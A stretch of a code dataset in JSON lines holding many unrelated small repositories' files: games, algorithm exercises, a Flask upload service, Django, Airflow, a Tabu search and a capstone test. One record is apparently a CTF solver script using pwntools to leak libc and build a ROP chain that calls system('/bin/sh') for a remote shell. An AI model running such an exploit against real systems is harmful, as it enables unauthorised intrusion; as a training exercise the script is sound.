'paper':\n print(Fore.GREEN + ' Congrats ', user, ' cuts ', comp)\n n.append(1)\n else:\n print(Fore.RED + ' Sorry ', comp, ' covered ', user)\n m.append(1)\n else:\n print(\" You've not entered a valid choice!, please enter either rock, paper or scissors\")\n\n\nuser_wins = sum(n) \ncomp_wins = sum(m)\nprint(Fore.GREEN + 'You have won ', user_wins, 'times')\nprint(Fore.RED + 'Computer has won', comp_wins , 'times')\nif comp_wins == user_wins:\n print(Fore.BLUE + \"That's a tie\")\nelif comp_wins > user_wins:\n print(Fore.RED + 'Sorry computer has won this time')\nelse:\n print(Fore.GREEN + 'Congrats, you have won the game !!!')\n\nprint(Style.RESET_ALL)\n","repo_name":"adarshrajnandu/Rock-Paper-Scissors","sub_path":"rock_paper_scissors.py","file_name":"rock_paper_scissors.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19609560963","text":"n, m = map(int, input().split())\nlength = list(map(int, input().split()))\n\nlim = max(length)\n\ndef binarySearch(array, start, end) :\n result = 0\n while start <= end :\n total = 0\n mid = (start+end)//2\n for i in array :\n if mid < i :\n total += i-mid\n if total >= m :\n result = mid\n start = mid+1\n else :\n end = mid-1\n return result\n\nprint(binarySearch(length, 0, lim))\n ","repo_name":"seongjukang/Algorithm_Solution","sub_path":"이코테_by_Python/BinarySearch_2.py","file_name":"BinarySearch_2.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34538444953","text":"from flask import Flask, request, jsonify\nfrom docx import Document\nimport magic\n\nfrom dotenv import load_dotenv, find_dotenv\nimport os\n_ = load_dotenv(find_dotenv()) # read local .env file\nTOKEN = os.environ['TOKEN']\n\napp = Flask(__name__)\n\n@app.route('/hello', methods=['GET'])\ndef hello():\n return jsonify({\"message\": \"Hello, World!\"})\n\n@app.route('/upload', methods=['POST'])\ndef upload_file():\n # Extract token from the Authorization header\n auth_header = request.headers.get('Authorization')\n\n if not auth_header:\n return jsonify(error=\"Missing Authorization header\"), 401\n\n # Extract the token from the Bearer format\n token = auth_header.split(\" \")[1] if \" 
\" in auth_header else auth_header\n\n # Check the token\n if token != TOKEN:\n return jsonify(error=\"Invalid token\"), 403\n\n # Check if a file was sent\n if 'file' not in request.files:\n return jsonify({'error': 'No file part'}), 400\n file = request.files['file']\n\n # If no filename provided, return error\n if file.filename == '':\n return jsonify({'error': 'No selected file'}), 400\n\n # If file exists, process it\n if file:\n # Read the Word Document\n doc = Document(file)\n fullText = []\n for para in doc.paragraphs:\n fullText.append(para.text)\n return magic.simplify('\\n'.join(fullText))\n\n return jsonify({'error': 'File processing failed'}), 500\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=8081)\n","repo_name":"calippo/traduttorelegalese-backend","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22487516516","text":"#!/usr/bin/python3.8\nimport warnings\nfrom pwn import *\nfrom termcolor import colored\nwarnings.filterwarnings(\"ignore\")\ncontext.arch = \"amd64\"\n\nfname = \"./challenge5\" \n\ne = ELF(fname)\nrop = ROP(e)\nlibc = ELF(e.runpath + b\"./libc.so.6\") \n\nLOCAL = False\n\nprompt = \">\"\n\ndef ret2libc(r, prompt, offset):\n\n #gdb.attach(r)\n r.recvuntil(\"address: [\")\n stack_addr = int(r.recvuntil(']')[:-1], 16)\n log.info(f\"Stack address @ {hex(stack_addr)}\")\n r.recvuntil(\"GOT: [\")\n libc.address = int(r.recvuntil(']')[:-1], 16) - libc.sym.printf\n log.info(f\"Libc base @ {hex(libc.address)}\")\n one_byte = stack_addr & 0xff\n log.info(f\"One byte: {hex(one_byte)}\")\n one_byte = p64(one_byte-8)[:1]\n \n # Craft payload to call system(\"/bin/sh\") and spawn shell\n pop_rdi = rop.find_gadget([\"pop rdi\"])[0]\n payload = p64(pop_rdi+1)\n payload += p64(pop_rdi)\n payload += p64(next(libc.search(b\"/bin/sh\")))\n payload += p64(pop_rdi+1)\n payload += p64(libc.sym.system)\n payload += b'\\x90'*(offset - len(payload))\n payload += one_byte\n log.info(f\"Len payload: {len(payload)}\")\n r.sendafter(prompt, payload)\n r.interactive()\n\n\ndef pwn():\n # Find the overflow offset\n offset = 64\n \n # Open a local process or a remote instance\n if LOCAL:\n r = process(fname)\n else:\n r = remote(\"0.0.0.0\", 1337)\n\n ret2libc(r, prompt, offset)\n\nif __name__ == \"__main__\":\n pwn()\n","repo_name":"w3th4nds/Thesis-2023","sub_path":"challenge5/challenge/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"18628770826","text":"import os\n\nos.system('clear')\n\n\n\nclass Vehiculo():\n #inicializamos los atributos\n def __init__(self, color, noruedas, nopuertas):\n\n self.color= color\n self.noruedas= noruedas\n self.nopuertas= nopuertas\n \n def __str__(self):\n return \"Color del auto: {}, No. de ruedas: {}, No. de puertas {}\".format(self.color, self.noruedas, self.nopuertas)\n \n\nclass Coche(Vehiculo):\n \n def __init__(self, color, noruedas, nopuertas, velocidad, cilindrada):\n self.color = color\n self.noruedas = noruedas\n self.nopuertas = nopuertas\n self.velocidad = velocidad\n self.cilindrada = cilindrada\n \n def __str__(self):\n return \"Color del auto :{}\\nNo. de ruedas :{}\\nNo. 
de puertas :{}\\nVelocidad :{}km/h\\nCilindrada :{}cc\".format(self.color, self.noruedas, self.nopuertas, self.velocidad, self.cilindrada)\n \n\n\nprimerauto = Coche(\"azul\", 4, 4, 160, 2000)\n\nprint(primerauto)\n\n\n \n ","repo_name":"rodasalfaro/open-bootcamp","sub_path":"python/clase6ejercicio1python.py","file_name":"clase6ejercicio1python.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71118449153","text":"from itertools import chain\n\nfrom psycopg2.extensions import adapt\nfrom django.contrib.postgres.search import SearchQuery\n\n\nclass PrefixedSearchQuery(SearchQuery):\n def as_sql(self, compiler, connection):\n terms = chain.from_iterable(\n expr.value.split() for expr in self.source_expressions\n )\n\n value = adapt(\"%s:*\" % \" & \".join(terms)).getquoted().decode(\"iso-8859-1\")\n\n if self.config:\n config_sql, config_params = compiler.compile(self.config)\n template = \"to_tsquery({}::regconfig, {})\\\n\t\t\t\t.format(config_sql, value)\"\n params = config_params\n else:\n template = \"to_tsquery({})\".format(value)\n params = []\n\n if self.invert:\n template = \"!!({})\".format(template)\n\n return template, params\n","repo_name":"LawyerMorty97/python-django-skeleton","sub_path":"src/utils/full_text_search.py","file_name":"full_text_search.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17401170426","text":"# Maybe it's a cipher? Maybe, but we don’t know for sure.\n\n# Maybe you can call it \"homomorphism\"? i wish I know this word before.\n\n# You need to check that the 2 given strings are isometric. This means that a character from one string can become a match for characters from another string.\n\n# One character from one string can correspond only to one character from another string. Two or more characters of one string can correspond to one character of another string, but not vice versa.\n\n# Input: Two arguments. Both strings.\n\n# Output: Boolean.\n\n# Precondition:\n# both strings are the same size\n\ndef isometric_strings(str1: str, str2: str) -> bool:\n \n #allocate local variables:\n inval = []\n outval = False #Guilty until proven innocent\n \n list1 = []\n list2 = []\n \n comp1 = \"\"\n comp2 = \"\"\n \n #Grab all non-duplicate letters from the first input\n for i in str1:\n if i not in inval and i != \" \": #Ignore spaces, as that might cause problems.\n inval.append(i)\n \n for i in range(0, len(inval)):#Assign each letter a unique number for comparison\n list1.append([inval[i], i])\n \n inval = [] #Reset inval real quick\n \n #Grab all non-duplicate letters from the second input\n for i in str2:\n if i not in inval and i != \" \":#Alternatively we could strip out all the spaces, but that'd be more tedious.\n inval.append(i)\n \n for i in range(0, len(inval)):#Assign each letter a unique number for comparison\n list2.append([inval[i], i])\n \n #A couple of debug calls\n #print(list1)\n #print(list2)\n \n #Replace each letter in the input string with it's corresponding number\n for i in list1:\n for j in str1:\n if j == i[0]:\n comp1 = f\"{comp1}{i[1]}\"\n \n #Do the same thing for the second string\n for i in list2:\n for j in str2:\n if j == i[0]:\n comp2 = f\"{comp2}{i[1]}\"\n \n #print(comp1)\n #print(comp2)\n \n #Compare the two. 
if they're equal, return True\n if comp2 == comp1:\n outval = True\n \n return outval\n \n# if __name__ == '__main__':\n# print(\"Example:\")\n# print(isometric_strings('add', 'egg'))\n\n# # These \"asserts\" are used for self-checking and not for an auto-testing\n# assert isometric_strings('add', 'egg') == True\n# assert isometric_strings('foo', 'bar') == False\n# assert isometric_strings('', '') == True\n# assert isometric_strings('all', 'all') == True\n# print(\"Coding complete? Click 'Check' to earn cool rewards!\")\n","repo_name":"Isaac-D-Dawson/Homework-Uploads","sub_path":"PyCheckIO/IsometricStrings.py","file_name":"IsometricStrings.py","file_ext":"py","file_size_in_byte":2601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73162986753","text":"import pymongo\nimport consoleExecute as consoleExecute\n\n\ndef main_implementation(param):\n print(param)\n comand = \"echo 'get startup-config /tmp/{0}.backup' | tftp {0}\"\n for line in consoleExecute.run_command(comand.format(param)):\n lineDecoded = line.decode('utf-8').strip()\n print(lineDecoded)\n return \"/tmp/{0}.backup\".format(param)\n\n\nif __name__ == \"__main__\":\n main_implementation(\"10.0.27.1\")\n","repo_name":"Deosc/ProyectoRedes","sub_path":"pyhton/practicas/ws/getConfigImp.py","file_name":"getConfigImp.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31815035031","text":"import os\nimport Action\n\nclass Entity:\n yes_no_str_buttons = \"[כן|לא]\"\n\n def __init__(self, rootDir, entityFileName, spellingFileName, conversationFileName):\n self.entityFileName = entityFileName\n self.spellingFileName = spellingFileName\n self.spelling = []\n self.actions = []\n self.entityNameHeb = \"\"\n self.InitSpellingBank(rootDir)\n actionsNames = os.listdir(rootDir + '/' + entityFileName)\n for action in actionsNames:\n if(\".\" not in action):\n self.actions.append(Action.Action(rootDir, entityFileName, action, spellingFileName, conversationFileName, self.entityNameHeb))\n\n def InitSpellingBank(self, rootDir):\n file = open(rootDir + '/' + self.entityFileName + '/' + self.spellingFileName, encoding='utf-8')\n self.spelling = [line.rstrip('\\n') for line in file]\n if len(self.spelling) > 0:\n self.entityNameHeb = self.spelling[0]\n file.close()\n\n def AskUserForAction(self):\n answer_actions = self.strAllActions()\n actions = \"\"\n if answer_actions[0] == 1:\n bold_action = \"\" + answer_actions[1] + \"\"\n actions += \"אני רק מוודא, התכוונת ל\" + bold_action + \"?\\n\" + self.yes_no_str_buttons\n else:\n actions += \"אני רק מוודא, התכוונת ל\\n\"\n actions += '[' + self.strAllActions() + ']'\n\n return actions\n\n def strAllActions(self):\n actions = \"\"\n\n if len(self.actions) == 1:\n action = self.actions[0]\n return [1, action.actionNameHeb + ' ' + action.entityNameHeb]\n else:\n for action in self.actions:\n actions += action.actionNameHeb + ' ' + action.entityNameHeb + '|'\n actions = actions[:len(actions) - 1]\n\n return [len(self.actions), actions]","repo_name":"RnDteam/CCai","sub_path":"hebChatbot/Entity.py","file_name":"Entity.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"31124232332","text":"from __future__ import annotations\n\nfrom dataclasses import dataclass\n\n__all__ = (\n \"RankingTab\",\n \"RankingTabs\",\n)\n\n\n@dataclass\nclass 
RankingTab:\n    \"\"\"The ranking tab for KM.\"\"\"\n\n    id: int\n    \"\"\":class:`int`: The ID of the tab.\"\"\"\n    name: str\n    \"\"\":class:`str`: The name of the tab.\"\"\"\n    tab: str\n    \"\"\":class:`str`: The tab name when used as :class:`click.Choice`.\"\"\"\n\n\nRankingTabs = [\n    RankingTab(3, \"Action\", \"action\"),\n    RankingTab(4, \"Sports\", \"sports\"),\n    RankingTab(5, \"Romance\", \"romance\"),\n    RankingTab(6, \"Isekai\", \"isekai\"),\n    RankingTab(7, \"Suspense\", \"suspense\"),\n    RankingTab(8, \"Outlaws\", \"outlaws\"),\n    RankingTab(9, \"Drama\", \"drama\"),\n    RankingTab(10, \"Fantasy\", \"fantasy\"),\n    RankingTab(11, \"Slice of Life\", \"sol\"),\n    RankingTab(12, \"All\", \"all\"),\n    RankingTab(13, \"Today's Specials\", \"specials\"),\n]\n","repo_name":"noaione/tosho-mango","sub_path":"tosho_mango/sources/kmkc/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"418199750","text":"from airflow.providers.amazon.aws.hooks.s3 import S3Hook\nfrom airflow.models import BaseOperator\nfrom airflow.utils.decorators import apply_defaults\nimport boto3 \nimport os\nimport logging\n\n\nclass DataLakeUpload(BaseOperator):\n    '''\n    Checking Datalake Transformations\n    '''\n    @apply_defaults\n    def __init__(self,aws_credentials_id,s3_bucket,path,keys,*args,**kwargs):\n        ''' \n        Arguments: \n        aws_credentials_id = Credentials of IAM-Role\n        s3_bucket = Bucket Name \n        path = Bucket Key/Subfolder\n        keys = Further Subfolder\n        '''\n        super(DataLakeUpload, self).__init__(*args,**kwargs)\n        self.aws_credentials_id = aws_credentials_id\n        self.s3_bucket = s3_bucket\n        self.path = path\n        self.keys = keys\n\n    def execute(self,context):\n        ''' \n        Execute function\n        '''\n        aws_hook = S3Hook(aws_conn_id=self.aws_credentials_id)\n        credentials = aws_hook.get_credentials()\n\n        s3=boto3.client('s3',aws_access_key_id=credentials.access_key,aws_secret_access_key=credentials.secret_key)\n\n        bucket_list=[]\n\n        for key in self.keys:\n            for upload in s3.list_objects(Bucket=self.s3_bucket,Delimiter='/', Prefix=self.path+key)['Contents']:\n                bucket_list.append(upload['Key'])\n            if len(bucket_list)>0:\n                logging.info('{} Files processed and uploaded'.format(key))\n            else:\n                assert bucket_list, \"No Files found for {}\".format(key) \n        ","repo_name":"AshrafIb/Data_Engineering_Capstone","sub_path":"plugins/operators/check_upload.py","file_name":"check_upload.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"11215779049","text":"# Create two lists, one of verified and one of unverified users\r\n\r\nunconfirmed_users = ['alex', 'max', 'john',]\r\nconfirmed_users = []\r\n\r\n# Go through each user from the end, printing the name as it is verified\r\n# Add verified users to the list of confirmed users\r\n\r\nwhile unconfirmed_users:\r\n    current_user = unconfirmed_users.pop()\r\n    print(\"Verifying user: \" + current_user.title())\r\n    confirmed_users.append(current_user)\r\n\r\n# Print the list of confirmed users\r\n\r\nprint(\"\\nList of confirmed users: \")\r\n\r\nfor confirmed_user in confirmed_users:\r\n    print(confirmed_user.title())\r\n\r\n","repo_name":"AlexProvatorov/python_crash_course","sub_path":"topic_7/confirmed_users.py","file_name":"confirmed_users.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"25226853934","text":"#!/usr/bin/env python\n\n# Capstone Python bindings, by Nguyen Anh Quynnh \nfrom __future__ import print_function\nimport sys\nfrom capstone import *\n\nCODE32 = b\"\\xc0\\xe0\\x02\"\nCODE32 += b\"\\xc0\\xf6\\x02\" # sal dh, 0\nCODE32 += b\"\\xc1\\xf6\\x00\" # sal esi, 0\nCODE32 += b\"\\x82\\xc0\\x00\"\nCODE32 += b\"\\x0f\\x1a\\x00\" # nop dword ptr [eax]\nCODE32 += b\"\\xf7\\xc0\\x11\\x22\\x33\\x44\" # test eax, 0x44332211\nCODE32 += b\"\\xf7\\xc8\\x11\\x22\\x33\\x44\" # test eax, 0x44332211\nCODE32 += b\"\\xf7\\x88\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" # test dword ptr [eax], 0\nCODE32 += b\"\\xf6\\x88\\x00\\x00\\x00\\x00\\x00\" # test byte ptr [eax], 0\n\nCODE32 += b\"\\xd9\\xd8\" # fstpnce st(0), st(0)\nCODE32 += b\"\\xdf\\xdf\" # fstp st(7), st(0)\n\nCODE32 += b\"\\x0f\\x20\\x00\" # mov eax, cr0\nCODE32 += b\"\\x0f\\x20\\x40\" # mov eax, cr0\nCODE32 += b\"\\x0f\\x20\\x80\" # mov eax, cr0\n\nCODE32 += b\"\\x0f\\x22\\x00\" # mov cr0, eax\nCODE32 += b\"\\x0f\\x22\\x40\" # mov cr0, eax\nCODE32 += b\"\\x0f\\x22\\x80\" # mov cr0, eax\n\nCODE32 += b\"\\x0f\\x21\\x00\" # mov eax, dr0\nCODE32 += b\"\\x0f\\x21\\x40\" # mov eax, dr0\nCODE32 += b\"\\x0f\\x21\\x80\" # mov eax, dr0\n\nCODE32 += b\"\\x0f\\x23\\x00\" # mov dr0, eax\nCODE32 += b\"\\x0f\\x23\\x40\" # mov dr0, eax\nCODE32 += b\"\\x0f\\x23\\x80\" # mov dr0, eax\n\n\n_python3 = sys.version_info.major == 3\n\nall_tests = (\n (CS_ARCH_X86, CS_MODE_32, CODE32, \"X86 32 (Intel syntax)\", 0),\n #(CS_ARCH_X86, CS_MODE_64, X86_CODE64, \"X86 64 (Intel syntax)\", 0),\n)\n\n\ndef to_hex(s):\n if _python3:\n return \" \".join(\"0x{0:02x}\".format(c) for c in s) # <-- Python 3 is OK\n else:\n return \" \".join(\"0x{0:02x}\".format(ord(c)) for c in s)\n\n# ## Test cs_disasm_quick()\ndef test_cs_disasm_quick():\n for (arch, mode, code, comment, syntax) in all_tests:\n print(\"Platform: %s\" % comment)\n print(\"Code: %s\" %(to_hex(code))),\n print(\"Disasm:\")\n for (addr, size, mnemonic, op_str) in cs_disasm_lite(arch, mode, code, 0x1000):\n print(\"0x%x:\\t%s\\t%s\" % (addr, mnemonic, op_str))\n print()\n\n\nif __name__ == '__main__':\n test_cs_disasm_quick()\n","repo_name":"cuckoosandbox/monitor","sub_path":"src/capstone/suite/x86odd.py","file_name":"x86odd.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","stars":315,"dataset":"github-code","pt":"61"} +{"seq_id":"4162440407","text":"from __future__ import print_function, division\nimport numpy as np\nfrom queue import Queue\n\nclass TabuSearch:\n def __init__(self, options, weights, values, capacities):\n self.itemCount = options['itemCount']\n self.dimensions = options['dimensions']\n self.maxStagnationCounter = options['maxStagnationCounter']\n self.diversificationFlips = options['diversificationFlips']\n self.tabuListSize = options['tabuListSize']\n self.maxIterations = options['maxIterations']\n self.weights = np.array(weights)\n self.values = np.array(values)\n self.capacities = np.array(capacities)\n\n if self.itemCount < 1:\n raise ValueError('Invalid itemCount value')\n if self.dimensions < 1:\n raise ValueError('Invalid dimensions value')\n if self.maxStagnationCounter < 0:\n raise ValueError('Invalid maxStagnationCounter value')\n if self.diversificationFlips < 0 or self.diversificationFlips > self.itemCount:\n raise ValueError('Invalid diversificationFlips value')\n if self.tabuListSize < 0:\n raise ValueError('Invalid tabuListSize value')\n if self.maxIterations < 1:\n raise ValueError('Invalid 
maxIterations value')\n if self.weights.shape != (self.dimensions, self.itemCount):\n raise ValueError('Invalid weights matrix')\n if self.values.shape != (self.itemCount,):\n raise ValueError('Invalid values vector')\n if self.capacities.shape != (self.dimensions,):\n raise ValueError('Invalid capacities vector')\n\n # Tabu search history variables\n self.feasibleSteps = 0\n self.infeasibleSteps = 0\n self.successfulDiversifications = 0\n self.failedDiversifications = 0\n self.solutionImprovements = 0\n self.tabuListFlushes = 0\n\n # Tabu search state variables\n self.curSolution = np.zeros(self.itemCount)\n self.curSolutionFeasible = True\n self.curInfeasibilityMeasure = 0\n self.bestSolution = np.zeros(self.itemCount)\n self.bestSolutionValue = 0\n self.stagnationCounter = 0\n self.stagnationList = np.zeros(self.itemCount)\n self.tabuSet = set()\n self.tabuQueue = Queue()\n\n\n def Run(self, printHistory = False):\n \"\"\"Runs the Tabu search algorithm with the specified options,\n returning the best found solution and its value.\n \"\"\"\n iteration = 0\n while iteration < self.maxIterations:\n self.Step()\n iteration += 1\n if printHistory:\n print('Feasible steps:', self.feasibleSteps)\n print('Infeasible steps:', self.infeasibleSteps)\n print('Successful diversifications:', self.successfulDiversifications)\n print('Failed diversifications:', self.failedDiversifications)\n print('Solution improvements:', self.solutionImprovements)\n print('Tabu list flushes:', self.tabuListFlushes)\n print('')\n\n return self.bestSolution, self.bestSolutionValue\n\n def Step(self):\n \"\"\"Runs a single step of the Tabu search algorithm, changing\n the state. Returns None.\n \"\"\"\n if self.curSolutionFeasible:\n self.StepFeasible()\n else:\n self.StepInfeasible()\n\n\n def StepFeasible(self):\n \"\"\"Called by the Step method if curSolution is feasible.\n \"\"\"\n self.feasibleSteps += 1\n newSolution, newSolutionValue = self.FindFeasibleSolution()\n if newSolution is not None:\n self.UpdateSolution(newSolution, newSolutionValue)\n else:\n diversified = self.Diversify()\n if not diversified:\n self.MoveToInfeasibleSpace()\n self.failedDiversifications += 1\n else:\n self.successfulDiversifications += 1\n\n\n def StepInfeasible(self):\n \"\"\"Called by the StepFeasible method if no feasible solution can be found\n or by Step if curSolution is infeasible.\n \"\"\"\n self.infeasibleSteps += 1\n self.MoveToFeasibleSpace()\n\n\n def Diversify(self):\n \"\"\"Called by StepFeasible. Returns True if diversification happened,\n False otherwise\n \"\"\"\n if self.stagnationCounter < self.maxStagnationCounter:\n return False\n else:\n newSolution = self.curSolution.copy()\n for flip in range(self.diversificationFlips):\n idx = self.stagnationList.argmax()\n newSolution[idx] = 1\n self.stagnationList[idx] = 0\n self.UpdateSolution(newSolution)\n self.stagnationCounter = 0\n return True\n\n\n def FindFeasibleSolution(self):\n \"\"\"Tries adding items into the solution until one is found that is feasible.\n The solution and its value are returned if its found, otherwise\n None, None is returned.\n \"\"\"\n candidate = self.curSolution.copy()\n for idx, elem in enumerate(self.curSolution):\n if elem == 0:\n candidate[idx] = 1\n if self.Feasible(candidate) and not self.TabuListContains(candidate):\n return candidate, self.SolutionValue(candidate)\n else:\n candidate[idx] = 0\n return None, None\n\n\n def Feasible(self, solution):\n \"\"\"solution is a numpy array of ones and zeros. 
The return value is\n a numpy bool, indicating whether or not the solution is feasible.\n \"\"\"\n return np.all(np.less_equal(np.dot(self.weights, solution), self.capacities))\n\n\n def SolutionValue(self, solution):\n \"\"\"solution is a numpy array of ones and zeros. The return value is a\n numpy int, or float if there's a weight that's a float.\n \"\"\"\n return np.sum(np.multiply(solution, self.values))\n\n\n def AddToTabuList(self, solution):\n \"\"\"Adds the solution (a numpy array of ones and zeros) into the tabu\n list\n \"\"\"\n if len(self.tabuSet) > self.tabuListSize:\n oldest = self.tabuQueue.get(block=False)\n self.tabuSet.remove(oldest)\n\n asTuple = tuple(solution)\n self.tabuQueue.put(asTuple, block=False)\n self.tabuSet.add(asTuple)\n\n\n def TabuListContains(self, solution):\n return tuple(solution) in self.tabuSet\n\n\n def UpdateSolution(self, newSolution, newSolutionValue = None):\n \"\"\"Updates all state variables.\n \"\"\"\n self.curSolution = newSolution\n self.AddToTabuList(newSolution)\n if newSolutionValue is None and not self.Feasible(newSolution):\n self.curSolutionFeasible = False\n else:\n self.curSolutionFeasible = True\n if newSolutionValue == None:\n newSolutionValue = self.SolutionValue(newSolution)\n if newSolutionValue > self.bestSolutionValue:\n self.UpdateBestSolution(newSolution, newSolutionValue)\n else:\n self.stagnationCounter += 1\n for idx, elem in enumerate(newSolution):\n if elem == 0:\n self.stagnationList[idx] += 1\n else:\n self.stagnationList[idx] = 0\n\n\n def UpdateBestSolution(self, newBestSolution, newBestSolutionValue):\n \"\"\"Does not check whether or not newBestSolution is actually better\n than self.bestSolution.\n \"\"\"\n self.solutionImprovements += 1\n self.bestSolution = newBestSolution\n self.bestSolutionValue = newBestSolutionValue\n self.stagnationCounter = 0\n\n\n def CalcInfeasibility(self, solution):\n \"\"\"Returns the sum of the normalized amounts by which each capacity is\n exceeded.\n \"\"\"\n resourceUsages = np.dot(self.weights, solution)\n infeasibilityMeasure = 0\n for usage, capacity in zip(resourceUsages, self.capacities):\n if usage > capacity:\n infeasibilityMeasure += (usage - capacity) / capacity\n return infeasibilityMeasure\n\n\n def MoveToInfeasibleSpace(self):\n \"\"\"Attempts to move the solution into infeasible space. If that's not\n possible, moves to the best worse solution. No return value.\n \"\"\"\n infeasibleSolution = self.BestInfeasibleSolution()\n if infeasibleSolution is not None:\n self.UpdateSolution(infeasibleSolution)\n return\n bestWorseSolution, bestWorseSolutionValue = self.BestWorseSolution()\n if bestWorseSolution is not None:\n self.UpdateSolution(bestWorseSolution, bestWorseSolutionValue)\n return\n # If all else fails, we flush the tabu list. This wastes an iteration.\n self.tabuSet = set()\n self.tabuQueue = Queue()\n self.tabuListFlushes += 1\n\n\n def MoveToFeasibleSpace(self):\n \"\"\"Attempts to move the solution into feasible space. 
If that fails,\n moves into the least infeasible neighboring solution not in the tabu\n list\n \"\"\"\n curCandidate = self.curSolution.copy()\n bestCandidate = None\n bestCandidateInfeasibility = float('inf')\n for idx, elem in enumerate(self.curSolution):\n curCandidate[idx] = 1 - curCandidate[idx]\n if not self.TabuListContains(curCandidate):\n curCandidateInfeasibility = self.CalcInfeasibility(curCandidate)\n if curCandidateInfeasibility == 0:\n self.UpdateSolution(curCandidate)\n return\n if curCandidateInfeasibility < bestCandidateInfeasibility:\n bestCandidate = curCandidate.copy()\n bestCandidateInfeasibility = curCandidateInfeasibility\n curCandidate[idx] = 1 - curCandidate[idx]\n if bestCandidate is not None:\n self.UpdateSolution(bestCandidate)\n else:\n # If we've failed to find a move, flush the tabu list. This wastes an iteration.\n self.tabuSet = set()\n self.tabuQueue = Queue()\n self.tabuListFlushes += 1\n\n\n def BestWorseSolution(self):\n \"\"\"Returns None, 0 if all worse solutions are in the tabu list, otherwise\n the worse solution and its value\n \"\"\"\n curWorseSolution = self.curSolution.copy()\n bestWorseSolution = None\n bestWorseSolutionValue = 0\n for idx, elem in enumerate(self.curSolution):\n if elem == 1:\n curWorseSolution[idx] = 0\n if not self.TabuListContains(curWorseSolution):\n curWorseSolutionValue = self.SolutionValue(curWorseSolution)\n if curWorseSolutionValue > bestWorseSolutionValue:\n bestWorseSolution = curWorseSolution.copy()\n bestWorseSolutionValue = curWorseSolutionValue\n curWorseSolution[idx] = 1\n return bestWorseSolution, bestWorseSolutionValue\n\n\n def BestInfeasibleSolution(self):\n \"\"\"Finds the best solution out of any neighboring one and returns it.\n Returns None if no solution not in the tabu list can be found.\n \"\"\"\n curInfeasibleSolution = self.curSolution.copy()\n curInfeasibleSolutionValue = self.SolutionValue(curInfeasibleSolution)\n bestInfeasibleSolution = None\n bestInfeasibleSolutionValue = curInfeasibleSolutionValue\n for idx, elem in enumerate(self.curSolution):\n if elem == 0:\n curInfeasibleSolution[idx] = 1\n if self.TabuListContains(curInfeasibleSolution):\n continue\n\n curInfeasibleSolutionValue = self.SolutionValue(curInfeasibleSolution)\n if curInfeasibleSolutionValue > bestInfeasibleSolutionValue:\n bestInfeasibleSolution = curInfeasibleSolution.copy()\n bestInfeasibleSolutionValue = curInfeasibleSolutionValue\n curInfeasibleSolution[idx] = 0\n\n return bestInfeasibleSolution\n\n\nif __name__ == '__main__':\n print('You\\'ve tried opening TabuSearch.py directly, you should just use the class instead')\n","repo_name":"muhamedparic/RIM1","sub_path":"OR/TS/TabuSearch.py","file_name":"TabuSearch.py","file_ext":"py","file_size_in_byte":12195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20974641755","text":"menu={\n \"Baja Taco\": 4.00,\n \"Burrito\": 7.50,\n \"Bowl\": 8.50,\n \"Nachos\": 11.00,\n \"Quesadilla\": 8.50,\n \"Super Burrito\": 8.50,\n \"Super Quesadilla\": 9.50,\n \"Taco\": 3.00,\n \"Tortilla Salad\": 8.00\n}\nnewMenu={}\nfor key in menu.items():\n i=0\n name=key[i].lower()\n newMenu[name]=menu[key[i]]\n i==i+1\n\ntotal=0\ndef sum():\n while True:\n try:\n item=input(\"Item: \").lower()\n if item in newMenu:\n global total\n total += newMenu[item]\n total2=format(total,\".2f\")\n print(f\"${total2}\")\n except EOFError:\n print()\n 
break\nsum()","repo_name":"Ciridaee/python_selfwork","sub_path":"python/start/taqueria/taqueria.py","file_name":"taqueria.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"242518474","text":"import time\nfrom datetime import datetime\n\nfrom .models import Document\n\n\ndef get_pubs_count(start, end):\n return Document.objects.raw(\"SELECT id, CAST(STRFTIME('%%Y', cover_date) AS INTEGER) AS year, \"\n \"CAST(strftime('%%j', cover_date) AS INTEGER) / 7 AS week, \"\n \"COUNT(*) as count \"\n \"FROM api_document \"\n \"WHERE year >= %s AND year <= %s \"\n \"GROUP BY year, week \", [start, end])\n\n\ndef get_pubs(start, end):\n time_start = time.time()\n pubs = get_pubs_count(start, end)\n time_mid = time.time()\n weeks_per_year = 53\n result = {}\n # for year in range(start, end + 1):\n # result[year] = [0] * weeks_per_year\n result = {year: [0] * weeks_per_year for year in range(start, end + 1)}\n for pub in pubs:\n result[pub.year][pub.week] = pub.count\n total = 0\n for year, weeks in result.items():\n for week, count in enumerate(weeks):\n total += count\n result[year][week] = 